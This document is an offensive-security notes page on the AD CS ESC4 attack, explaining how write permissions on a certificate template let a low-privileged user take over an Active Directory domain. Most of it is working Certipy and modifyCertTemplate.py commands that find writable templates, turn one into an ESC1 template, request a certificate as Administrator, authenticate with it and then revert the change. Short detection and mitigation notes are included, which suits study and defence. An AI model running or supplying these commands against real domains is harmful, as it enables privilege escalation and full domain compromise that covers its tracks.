attack-30-esc4-template-write-permissions.md (4890B)
1 --- 2 title: "Attack #30 โ ESC4 Template Write Permissions" 3 description: "ESC4 exploits overly permissive ACLs on certificate templates. If a low-privileged user has WriteProperty, WriteDACL, WriteOwner, or FullControl on aโฆ" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "adcs", "privilege-escalation"] 7 tools: ["Certipy"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/๐ข Attack #30 โ ESC4 Template Write Permissions.md" 11 --- 12 # ๐ข Attack #30 โ ESC4: Template Write Permissions 13 14 *** 15 16 ## ๐ How It Works 17 18 ESC4 exploits **overly permissive ACLs on certificate templates**. If a low-privileged user has **WriteProperty, WriteDACL, WriteOwner, or FullControl** on a template object, they can modify that template's configuration to make it vulnerable to ESC1 โ enabling the `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` flag, adding Client Authentication EKU, and removing approval requirements. Once modified, the attacker enrolls using the now-vulnerable template to get a certificate for any user. 19 20 ### The Attack Flow 21 22 ``` 23 1. Find a template where you have write permissions 24 2. Modify the template: 25 - Enable ENROLLEE_SUPPLIES_SUBJECT (allows SAN specification) 26 - Set EKU to Client Authentication 27 - Disable Manager Approval 28 - Disable Authorized Signatures 29 3. Request certificate with SAN = Administrator 30 4. Authenticate as Administrator 31 5. Revert template changes (cleanup) 32 ``` 33 34 *** 35 36 ## โ๏ธ Prerequisites 37 38 | Requirement | Detail | 39 |---|---| 40 | **Write permissions on template** | WriteProperty, WriteDACL, WriteOwner, or FullControl | 41 | **Enrollment rights** | Must also be able to enroll for the template | 42 43 *** 44 45 ## ๐ป Full Commands 46 47 ### ๐ต Enumerate Writable Templates 48 49 ```bash 50 # โโ Certipy โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 51 certipy find -u low_user@corp.local -p 'Password1' -dc-ip 10.10.10.10 -vulnerable -stdout 52 # Look for: ESC4 โ template ACL allows modification 53 54 # โโ modifyCertTemplate.py โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 55 python3 modifyCertTemplate.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 \ 56 -template VulnTemplate -get-acl 57 ``` 58 59 ### ๐ด Modify Template โ Convert to ESC1 60 61 ```bash 62 # โโ Certipy โ modify template to be ESC1-vulnerable โโโโโโโโโโโโโโโโโโโโโโโโโโ 63 # Save current config first: 64 certipy template -u low_user@corp.local -p 'Password1' \ 65 -template VulnTemplate -save-old -dc-ip 10.10.10.10 66 67 # Modify to ESC1: 68 certipy template -u low_user@corp.local -p 'Password1' \ 69 -template VulnTemplate -dc-ip 10.10.10.10 \ 70 -configuration ESC1 71 72 # โโ Alternative: modifyCertTemplate.py โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 73 python3 modifyCertTemplate.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 \ 74 -template VulnTemplate \ 75 -add enrollee_supplies_subject \ 76 -add client_authentication 77 ``` 78 79 ### ๐ด Exploit as ESC1 80 81 ```bash 82 # โโ Request certificate with SAN = Administrator โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 83 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \ 84 -template VulnTemplate -upn Administrator@corp.local -dc-ip 10.10.10.10 85 86 # โโ Authenticate โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 87 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 88 ``` 89 90 ### ๐ด Cleanup โ Revert Template 91 92 ```bash 93 # โโ Restore original template configuration โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 94 certipy template -u low_user@corp.local -p 'Password1' \ 95 -template VulnTemplate -dc-ip 10.10.10.10 -configuration VulnTemplate.json 96 ``` 97 98 *** 99 100 ## ๐ก๏ธ Detection โ Event IDs 101 102 | Event ID | Source | What to Look For | 103 |---|---|---| 104 | **4899** | Security Log (CA) | Certificate template modification | 105 | **5136** | Security Log (DC) | AD object modification (template object in CN=Certificate Templates) | 106 107 *** 108 109 ## ๐ Attack Chain Context 110 111 ``` 112 [ESC4] โโโ Write access on template โ convert to ESC1 โ domain compromise 113 โ 114 โโโโ ๐ Converts any writable template into ESC1 115 โโโโ ๐ Always revert changes after exploitation 116 โโโโ ๐ Defeated by: restrict template ACLs, monitor 4899/5136 117 ``` 118 119 *** 120 121 > โ **Attack #30 โ ESC4 complete.**